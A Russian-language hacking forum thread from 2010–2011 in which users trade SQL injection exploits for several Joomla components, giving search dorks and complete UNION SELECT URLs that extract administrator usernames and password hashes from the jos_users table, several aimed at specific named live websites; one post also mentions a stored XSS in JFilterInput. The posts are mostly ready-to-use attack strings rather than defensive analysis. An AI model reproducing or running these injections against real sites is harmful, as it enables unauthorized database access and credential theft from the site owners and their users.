ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.08.2010, 00:35
|
|
Познающий
Регистрация: 05.01.2009
Сообщений: 32
Провел на форуме: 146971
Репутация:
12
|
|
Keltos - да, понимаю, просто пока я не столь подкован чтобы раскрутить самостоятельно SQL inj. - попросил помощи(составить запрос к SQL).
|
|
|

08.09.2010, 19:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 5079
Репутация:
0
|
|
Сообщение от usasoft
usasoft said:
1.5.10 - 1.5.15
А точнее никак нельзя?=)
В общем если кому понадобиться, это версия 1.5.15
|
|
|
|

27.10.2010, 16:12
|
|
Новичок
Регистрация: 22.04.2010
Сообщений: 2
Провел на форуме: 4959
Репутация:
0
|
|
Код:
Code:
Joomla Component com_phocagallery SQL injection Vulnerability
сомнительная уязвимость, учитывая, что
Код:
Code:
$Itemid = JRequest::getInt( 'Itemid');
|
|
|

06.12.2010, 10:23
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Наверное надо оживить тему?-)
Компонент: com_storedirectory
Тип: Sql-Inj
Уязвимость в параметре id:
PoC:
http://www.cockburngateway.com.au/index.php?option=com_storedirectory&task=view&id=1 +union+select+1,2,concat%28username,0x3a,password, 0x3a,usertype%29,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21+from+jos_users--
|
|
|

06.12.2010, 18:53
|
|
Новичок
Регистрация: 29.11.2008
Сообщений: 6
Провел на форуме: 177127
Репутация:
29
|
|
Joomla 1.5-xx
com_congratulations
index.php?option=com_congratulations&Itemid=1&task =date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT((SELECT+TABLE_NAME+FROM+INFORMATION_SCH EMA.TABLES+limit+1,1)),0x71),0x71)--
http://school29.kurgan.cc/index.php?option=com_congratulations&Itemid=1&task =date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT((SELECT+CONCAT_WS(0x3a,username,passwor d)+FROM+jos_users+limit+1,1)),0x71),0x71)--
|
|
|

14.12.2010, 22:20
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
SQL inj в компоненте com_jeformcr
Доброго времени суток
SQl-Inj в com_jeformcr
Уязвимый параметр: id
Подбор кол-ва колонок через order+by
PoC:
http://www.rcreventos.com.br/rcr/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11+from+jos_users+where+usertype='S uper%20Administrator'--
http://jrfu.org/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11+from+jos_users+where+usertype='S uper%20Administrator'--
|
|
|

02.01.2011, 02:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 1686
Репутация:
0
|
|
Уязвимость: SQL Injection Vulnerability
Компонент: com_idoblog
Dork: inurl:"com_idoblog"
Language: php
http://extensions.joomla.org/extensions/news-production/blog/9218
Exploit:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62+union+select+1,2,concat%28username,0 x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13 ,14,15,16+from+jos_users--
|
|
|
|

19.01.2011, 01:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 8038
Репутация:
5
|
|
Уязвимость: Blind SQL Injection Vulnerability
Компонент: allCineVid
Dork: inurl:"com_allcinevid"
Language: php
http://www.joomtraders.com
Exploit:
http://site/path/index.php?option=com_allcinevid&tmpl=component&id= 1 and 1=1
http://site/path/index.php?option=com_allcinevid&tmpl=component&id= 1 and 1=0
|
|
|
|

24.01.2011, 23:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 8038
Репутация:
5
|
|
Уязвимость: Multiple SQL Injection Vulnerability
Компонент: Portfolio
Dork: inurl:"com_allcinevid"
Language: php
http://www.salvatorefresta.net
Exploit:
http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
|
|
|
|

15.02.2011, 02:22
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме: 1350
Репутация:
0
|
|
Joomla active XSS JFilterInput
Наличие эксплоита: Да
Активная XSS в Joomla версии 1.6 и более ранних. Уязвимость связана с недостаточной
фильтрацией входных данных в классе JFilterInput.
В версии 1.6, к примеру, можно проверить при включенном модуле Userrofile, вбив в поле About Me
следующий код:
В остальных случаях и версиях данной уязвимости подвержен любой модуль который принимает данные от пользователя.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|